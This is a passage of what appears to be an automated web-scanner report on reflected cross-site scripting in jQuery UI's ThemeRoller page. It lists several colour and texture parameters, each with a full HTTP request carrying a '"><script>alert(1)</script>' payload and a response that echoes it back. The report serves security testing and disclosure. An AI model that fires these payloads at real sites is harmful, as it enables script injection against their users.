4.56. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3967f"><script>alert(1)</script>06e01fad325 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3967f"><script>alert(1)</script>06e01fad325&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3967f"><script>alert(1)</script>06e01fad325&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

4.57. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b598f"><script>alert(1)</script>9b666fce69d was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngb598f"><script>alert(1)</script>9b666fce69d&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngb598f"><script>alert(1)</script>9b666fce69d&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.58. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d6e"><script>alert(1)</script>f49d4a88311 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e768d6e"><script>alert(1)</script>f49d4a88311&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e768d6e"><script>alert(1)</script>f49d4a88311&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorE
...[SNIP]...

4.59. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425e2"><script>alert(1)</script>1e60faee7e4 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2425e2"><script>alert(1)</script>1e60faee7e4&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2425e2"><script>alert(1)</script>1e60faee7e4&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5
...[SNIP]...

4.60. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9910"><script>alert(1)</script>45b756f1365 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd9910"><script>alert(1)</script>45b756f1365&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd9910"><script>alert(1)</script>45b756f1365&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextur
...[SNIP]...

4.61. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9875"><script>alert(1)</script>ed090a1eadc was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa9875"><script>alert(1)</script>ed090a1eadc&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa9875"><script>alert(1)</script>ed090a1eadc&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

4.62. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fc0"><script>alert(1)</script>1c9dbf1a53a was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7c0fc0"><script>alert(1)</script>1c9dbf1a53a&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
da%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7c0fc0"><script>alert(1)</script>1c9dbf1a53a&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefaul
...[SNIP]...

4.63. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3c6"><script>alert(1)</script>fbf0392ad7e was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e5b3c6"><script>alert(1)</script>fbf0392ad7e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e5b3c6"><script>alert(1)</script>fbf0392ad7e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

4.64. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bc9"><script>alert(1)</script>0a3d7e23c38 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7e3bc9"><script>alert(1)</script>0a3d7e23c38&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
